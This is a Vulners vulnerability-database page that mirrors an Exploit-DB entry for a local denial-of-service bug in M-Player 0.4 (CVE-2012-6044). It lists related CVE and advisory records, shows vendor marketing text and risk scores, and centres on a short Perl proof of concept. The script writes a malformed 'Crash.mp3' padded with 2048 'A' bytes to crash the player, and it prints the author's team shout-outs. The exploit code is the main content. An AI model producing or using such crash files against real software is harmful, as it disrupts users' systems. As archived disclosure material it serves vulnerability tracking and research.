Lucene search
+L

M-Player 0.4 - Local Denial of Service

🗓️ 08 Jan 2012 00:00:00Reported by JaMbAType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

M-Player 0.4 Local Denial of Service Vulnerability in Per

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-6044
8 Jan 201200:00
circl
cve
CVE
CVE-2012-6044
26 Nov 201222:00
cve
cvelist
Cvelist
CVE-2012-6044
26 Nov 201222:00
cvelist
euvd
EUVD
EUVD-2012-5918
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-6044
26 Nov 201222:55
nvd
prion
Prion
Design/Logic Flaw
26 Nov 201222:55
prion
#!/usr/bin/perl

# Exploit Title: M-Player 0.4 Local Denial of Service Vulnerability
# Date: 08/01/2012
# Author: JaMbA
# Download:
http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/M-Player.shtml
# Version: 0.4
# Tested on: Windows 7

my $file= "Crash.mp3";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.mp3 File Created successfully\n";
print "\ I'am From Tunisia (Ahmadso best Friend)\n";
print "\ Dz-Devloper Work Team (wanted_29  Dr.Smt  z4k!_xy  ak27 DR.KIM
Samoray Mr_Ghost)\n";
close($FILE);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Oct 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.0248
37